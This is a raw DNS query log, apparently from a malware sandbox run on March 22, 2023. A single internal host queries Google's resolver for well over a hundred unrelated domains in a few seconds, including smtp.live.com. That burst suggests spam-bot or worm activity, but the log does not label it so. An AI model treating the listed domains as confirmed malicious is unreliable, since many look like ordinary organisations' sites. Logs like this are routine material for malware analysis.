                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.697609901 CET192.168.2.58.8.8.80x418eStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.766058922 CET192.168.2.58.8.8.80xe6a7Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.819308996 CET192.168.2.58.8.8.80x9dc8Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.860614061 CET192.168.2.58.8.8.80x1507Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.929600954 CET192.168.2.58.8.8.80x7aeeStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.954227924 CET192.168.2.58.8.8.80xf730Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.016335964 CET192.168.2.58.8.8.80x213bStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.022526979 CET192.168.2.58.8.8.80x92baStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.111629009 CET192.168.2.58.8.8.80x4376Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.134892941 CET192.168.2.58.8.8.80xe7a2Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.138592005 CET192.168.2.58.8.8.80xb5baStandard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.145060062 CET192.168.2.58.8.8.80x1d55Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.145255089 CET192.168.2.58.8.8.80x6970Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.145255089 CET192.168.2.58.8.8.80xf90Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.145409107 CET192.168.2.58.8.8.80xd792Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.149245024 CET192.168.2.58.8.8.80x5d9cStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.149245024 CET192.168.2.58.8.8.80x6d87Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.151217937 CET192.168.2.58.8.8.80x9ecfStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.151217937 CET192.168.2.58.8.8.80x4e28Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.154345989 CET192.168.2.58.8.8.80x864aStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.163398981 CET192.168.2.58.8.8.80x6141Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.171418905 CET192.168.2.58.8.8.80x4ee4Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.183257103 CET192.168.2.58.8.8.80x34f8Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.198163986 CET192.168.2.58.8.8.80x81faStandard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.200809956 CET192.168.2.58.8.8.80x6c9Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.228235006 CET192.168.2.58.8.8.80x5207Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.230495930 CET192.168.2.58.8.8.80xa9e3Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.278480053 CET192.168.2.58.8.8.80xc3e3Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.438230991 CET192.168.2.58.8.8.80x7513Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.441318989 CET192.168.2.58.8.8.80x71aStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.461352110 CET192.168.2.58.8.8.80x5622Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.463238955 CET192.168.2.58.8.8.80xa3cdStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.490441084 CET192.168.2.58.8.8.80x8562Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.492810965 CET192.168.2.58.8.8.80x163bStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.559761047 CET192.168.2.58.8.8.80xfd9cStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.574775934 CET192.168.2.58.8.8.80xf617Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.575303078 CET192.168.2.58.8.8.80x48dStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.622454882 CET192.168.2.58.8.8.80xdd93Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.701353073 CET192.168.2.58.8.8.80xe848Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.748189926 CET192.168.2.58.8.8.80x60acStandard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.766670942 CET192.168.2.58.8.8.80xa650Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.792752028 CET192.168.2.58.8.8.80xbbebStandard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.793570995 CET192.168.2.58.8.8.80x3b59Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.796705961 CET192.168.2.58.8.8.80xcc06Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.903043032 CET192.168.2.58.8.8.80x39a8Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.904150963 CET192.168.2.58.8.8.80x9ec1Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.930299044 CET192.168.2.58.8.8.80xc68aStandard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.995834112 CET192.168.2.58.8.8.80xe43dStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.013221979 CET192.168.2.58.8.8.80x18d0Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.013895988 CET192.168.2.58.8.8.80xab38Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.082050085 CET192.168.2.58.8.8.80x3692Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.116488934 CET192.168.2.58.8.8.80x959eStandard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.133467913 CET192.168.2.58.8.8.80xab25Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.133467913 CET192.168.2.58.8.8.80x27b1Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.134773016 CET192.168.2.58.8.8.80x5c9cStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.223928928 CET192.168.2.58.8.8.80xfc69Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.229600906 CET192.168.2.58.8.8.80x3448Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.239458084 CET192.168.2.58.8.8.80xc980Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.239458084 CET192.168.2.58.8.8.80x3adeStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.245505095 CET192.168.2.58.8.8.80x229bStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.245537996 CET192.168.2.58.8.8.80x4db6Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.247365952 CET192.168.2.58.8.8.80x6beeStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.249779940 CET192.168.2.58.8.8.80x5575Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.296175957 CET192.168.2.58.8.8.80x2aeeStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.342582941 CET192.168.2.58.8.8.80xe204Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.373254061 CET192.168.2.58.8.8.80x189dStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.404489040 CET192.168.2.58.8.8.80x387aStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.420027018 CET192.168.2.58.8.8.80x9527Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.447882891 CET192.168.2.58.8.8.80x390Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.460311890 CET192.168.2.58.8.8.80xc36eStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.461865902 CET192.168.2.58.8.8.80xeb2dStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.569396019 CET192.168.2.58.8.8.80x7871Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.569396973 CET192.168.2.58.8.8.80x75c4Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.570849895 CET192.168.2.58.8.8.80x137dStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.604171991 CET192.168.2.58.8.8.80xf37bStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.610944033 CET192.168.2.58.8.8.80xd997Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.671596050 CET192.168.2.58.8.8.80xdf47Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.870321989 CET192.168.2.58.8.8.80x43e5Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.888408899 CET192.168.2.58.8.8.80x114bStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.972511053 CET192.168.2.58.8.8.80x4de5Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.980097055 CET192.168.2.58.8.8.80x55afStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.980398893 CET192.168.2.58.8.8.80x891cStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.983916044 CET192.168.2.58.8.8.80xdd8fStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.983916998 CET192.168.2.58.8.8.80x3accStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.985799074 CET192.168.2.58.8.8.80x62c2Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.985799074 CET192.168.2.58.8.8.80x9d95Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.006720066 CET192.168.2.58.8.8.80xb22bStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.042718887 CET192.168.2.58.8.8.80xb499Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.080468893 CET192.168.2.58.8.8.80x39a8Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.088689089 CET192.168.2.58.8.8.80x5c03Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.109563112 CET192.168.2.58.8.8.80xd842Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.151329994 CET192.168.2.58.8.8.80xd9c4Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.151832104 CET192.168.2.58.8.8.80xca9aStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.151832104 CET192.168.2.58.8.8.80xeb18Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.152014971 CET192.168.2.58.8.8.80x5c7eStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.165709972 CET192.168.2.58.8.8.80xffa6Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.296786070 CET192.168.2.58.8.8.80xbaf2Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.298566103 CET192.168.2.58.8.8.80x6ca3Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.317656040 CET192.168.2.58.8.8.80xf3a9Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.359287024 CET192.168.2.58.8.8.80x70e9Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.359819889 CET192.168.2.58.8.8.80x38edStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.410088062 CET192.168.2.58.8.8.80x982fStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.410088062 CET192.168.2.58.8.8.80x6a28Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.410870075 CET192.168.2.58.8.8.80x1983Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.418982983 CET192.168.2.58.8.8.80xc6f3Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.419754982 CET192.168.2.58.8.8.80xb083Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.424345970 CET192.168.2.58.8.8.80x619fStandard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.428678989 CET192.168.2.58.8.8.80x72f3Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.489815950 CET192.168.2.58.8.8.80x4eceStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.497981071 CET192.168.2.58.8.8.80x4bfbStandard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.521282911 CET192.168.2.58.8.8.80xa5c0Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.527718067 CET192.168.2.58.8.8.80x4498Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.529679060 CET192.168.2.58.8.8.80xf655Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.530371904 CET192.168.2.58.8.8.80x25d4Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.530644894 CET192.168.2.58.8.8.80x5ec1Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.575623989 CET192.168.2.58.8.8.80xb4deStandard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.659079075 CET192.168.2.58.8.8.80x64b3Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.685817957 CET192.168.2.58.8.8.80xe98bStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.689596891 CET192.168.2.58.8.8.80x884cStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.763107061 CET192.168.2.58.8.8.80x11fdStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.773822069 CET192.168.2.58.8.8.80xe00aStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.773822069 CET192.168.2.58.8.8.80x66faStandard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.776103020 CET192.168.2.58.8.8.80x712dStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.861315012 CET192.168.2.58.8.8.80xac21Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.864876032 CET192.168.2.58.8.8.80x71a6Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.871567965 CET192.168.2.58.8.8.80x7c8eStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.872513056 CET192.168.2.58.8.8.80xba9Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.872720003 CET192.168.2.58.8.8.80xf866Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.932503939 CET192.168.2.58.8.8.80xa237Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.943264008 CET192.168.2.58.8.8.80xaae2Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.946317911 CET192.168.2.58.8.8.80x5bbStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.946923971 CET192.168.2.58.8.8.80x6caeStandard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.001292944 CET192.168.2.58.8.8.80x30f5Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.066708088 CET192.168.2.58.8.8.80xf5a9Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.069570065 CET192.168.2.58.8.8.80xed3eStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.075886011 CET192.168.2.58.8.8.80xdd5fStandard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.089041948 CET192.168.2.58.8.8.80x2394Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.131958008 CET192.168.2.58.8.8.80xd27eStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.134445906 CET192.168.2.58.8.8.80xad9cStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.174161911 CET192.168.2.58.8.8.80xca9aStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.197602034 CET192.168.2.58.8.8.80x9e72Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.235996962 CET192.168.2.58.8.8.80x2829Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.244096994 CET192.168.2.58.8.8.80xc118Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.319375038 CET192.168.2.58.8.8.80xca11Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.337661028 CET192.168.2.58.8.8.80x3476Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.339315891 CET192.168.2.58.8.8.80x897fStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.344142914 CET192.168.2.58.8.8.80x34caStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.348845959 CET192.168.2.58.8.8.80x72a4Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.352399111 CET192.168.2.58.8.8.80x4619Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.371094942 CET192.168.2.58.8.8.80x6bbfStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.481483936 CET192.168.2.58.8.8.80x2db7Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.490288019 CET192.168.2.58.8.8.80x984Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.494019985 CET192.168.2.58.8.8.80x54e8Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.495440960 CET192.168.2.58.8.8.80x7f5cStandard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.618102074 CET192.168.2.58.8.8.80xdeffStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.622431040 CET192.168.2.58.8.8.80x453fStandard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.636480093 CET192.168.2.58.8.8.80x9418Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.682871103 CET192.168.2.58.8.8.80x50e3Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.687680006 CET192.168.2.58.8.8.80x8af8Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.755279064 CET192.168.2.58.8.8.80xad62Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.764394999 CET192.168.2.58.8.8.80x17b4Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.868546963 CET192.168.2.58.8.8.80xf25Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.888560057 CET192.168.2.58.8.8.80x6710Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.940354109 CET192.168.2.58.8.8.80x4867Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.953773022 CET192.168.2.58.8.8.80xce86Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.953773022 CET192.168.2.58.8.8.80x67b2Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.051587105 CET192.168.2.58.8.8.80x4c34Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.052150011 CET192.168.2.58.8.8.80xc560Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.056703091 CET192.168.2.5202.12.27.330x75Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.105372906 CET192.168.2.58.8.8.80x1d80Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.112682104 CET192.168.2.58.8.8.80x595dStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.168742895 CET192.168.2.58.8.8.80xbecdStandard query (0)wnit.orgA (IP address)IN (0x0001)false
